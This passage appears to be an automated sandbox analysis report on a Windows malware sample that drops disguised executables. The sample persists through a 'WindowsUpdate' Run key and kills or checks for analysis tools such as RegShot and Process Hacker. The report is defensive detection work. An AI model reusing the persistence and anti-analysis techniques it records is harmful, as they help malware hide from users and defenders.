                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_00265773 push ecx; ret 0_2_00265786
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_01192801 push cs; iretd 7_3_01192802
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_01192801 push cs; iretd 7_3_01192802
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_01192801 push cs; iretd 7_3_01192802
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_01192801 push cs; iretd 7_3_01192802
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_01192FCB push cs; retf 7_3_01192FE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_01192FCB push cs; retf 7_3_01192FE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_01192FCB push cs; retf 7_3_01192FE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_01192FCB push cs; retf 7_3_01192FE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_01192801 push cs; iretd 7_3_01192802
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_01192801 push cs; iretd 7_3_01192802
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_01192801 push cs; iretd 7_3_01192802
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_01192801 push cs; iretd 7_3_01192802
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_01192FCB push cs; retf 7_3_01192FE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_01192FCB push cs; retf 7_3_01192FE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_01192FCB push cs; retf 7_3_01192FE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_01192FCB push cs; retf 7_3_01192FE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_01192801 push cs; iretd 7_3_01192802
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_01192801 push cs; iretd 7_3_01192802
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_01192801 push cs; iretd 7_3_01192802
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_01192801 push cs; iretd 7_3_01192802
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_01192FCB push cs; retf 7_3_01192FE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_01192FCB push cs; retf 7_3_01192FE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_01192FCB push cs; retf 7_3_01192FE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_01192FCB push cs; retf 7_3_01192FE2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_01192801 push cs; iretd 7_3_01192802
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_01192801 push cs; iretd 7_3_01192802
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_01192801 push cs; iretd 7_3_01192802
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_01192801 push cs; iretd 7_3_01192802
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_3_01192FCB push cs; retf 7_3_01192FE2

                Persistence and Installation Behavior

                barindex
                Uses ipconfig to lookup or modify the Windows network settings
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeFile created: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe.exeJump to dropped file
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2File created: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2File created: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2File created: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeJump to dropped file
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2File created: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2Jump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WindowsUpdateJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WindowsUpdateJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdateJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdateJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008E25A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,7_2_008E25A0
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_0086FC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,7_2_0086FC8A
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_003C25A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,15_2_003C25A0
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_0034FC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,15_2_0034FC8A
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Process information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Process information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Process information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Process information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Process information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\UserAccountControlSettings.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM autoit script
                Source: Yara matchFile source: Process Memory Space: dmqiuorkt.mp2 PID: 1212, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: dmqiuorkt.mp2.exe PID: 6808, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: dmqiuorkt.mp2.exe PID: 2788, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: dmqiuorkt.mp2.exe PID: 6900, type: MEMORYSTR
                Found API chain indicative of sandbox detection
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_7-101953
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: dmqiuorkt.mp2.exe, 0000000F.00000002.1812557613.0000000001797000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262397696.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2320622298.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000002.2342249958.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262683227.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262539835.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262757418.0000000000D67000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262623069.0000000000D51000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2238224819.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2238029305.0000000000DE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
                Source: dmqiuorkt.mp2.exe, 00000015.00000003.2238224819.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2238029305.0000000000DE0000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2237826667.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2237721841.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2318771760.0000000000E49000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2238275486.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000002.2321080150.0000000000E4A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2238174115.0000000000E32000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2238117536.0000000000E23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXE-
                Source: dmqiuorkt.mp2.exe, 0000000F.00000003.1796493806.00000000016DF000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796536466.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1797494978.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796610235.00000000016F3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1797214639.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796366979.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1701801021.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2261949905.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.1874703095.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262109183.0000000000CBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.00000000085D3000.00000004.00000020.00020000.00000000.sdmp, tdggoffi.bin.7.drBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
                Source: dmqiuorkt.mp2.exe, 00000015.00000003.2237944489.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2273458424.0000000000DB4000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2238956203.0000000000DB4000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2295469789.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2237721841.0000000000D97000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2237897485.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2238414557.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000002.2320843178.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.1979898615.0000000000D95000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2238321465.0000000000DAB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")86
                Source: dmqiuorkt.mp2, 00000007.00000002.1627584125.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1625028395.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624639727.0000000001057000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624888422.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624787830.00000000010BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEZ
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.00000000085D3000.00000004.00000020.00020000.00000000.sdmp, tdggoffi.bin.7.drBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")
                Source: dmqiuorkt.mp2, 00000007.00000003.1624969217.0000000001032000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1518830857.0000000001015000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624198548.000000000101D000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624450480.0000000001027000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624768322.000000000102A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1518771568.0000000001004000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000002.1627128836.0000000001033000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000002.1812330526.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796493806.00000000016DF000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1797643349.00000000016F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")
                Source: dmqiuorkt.mp2, 00000007.00000003.1624969217.0000000001032000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1518830857.0000000001015000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624198548.000000000101D000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624450480.0000000001027000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624768322.000000000102A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1518771568.0000000001004000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000002.1627128836.0000000001033000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")SC%A
                Source: dmqiuorkt.mp2, 00000007.00000003.1624639727.0000000001057000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000002.1627147751.0000000001057000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1625792919.0000000001057000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1518771568.0000000001057000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796493806.00000000016DF000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796594142.00000000016E3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1811447953.00000000016E4000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796366979.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1701801021.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2261949905.0000000000CB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
                Source: dmqiuorkt.mp2, 00000007.00000002.1627584125.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1625028395.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624639727.0000000001057000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624888422.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624787830.00000000010BF000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000002.1812557613.0000000001797000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262397696.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2320622298.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000002.2342249958.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262683227.0000000000D58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXES
                Source: dmqiuorkt.mp2.exe, 00000012.00000003.2261949905.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.1874703095.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2313808824.0000000000CD5000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262109183.0000000000CBF000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2295004396.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262245963.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262397696.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000002.2339694117.0000000000CD5000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2270613615.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.1864447952.0000000000CA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE"))
                Source: dmqiuorkt.mp2, 00000007.00000002.1627584125.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1625028395.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624639727.0000000001057000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624888422.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624787830.00000000010BF000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000002.1812557613.0000000001797000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262397696.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2320622298.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000002.2342249958.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2262683227.0000000000D58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXE
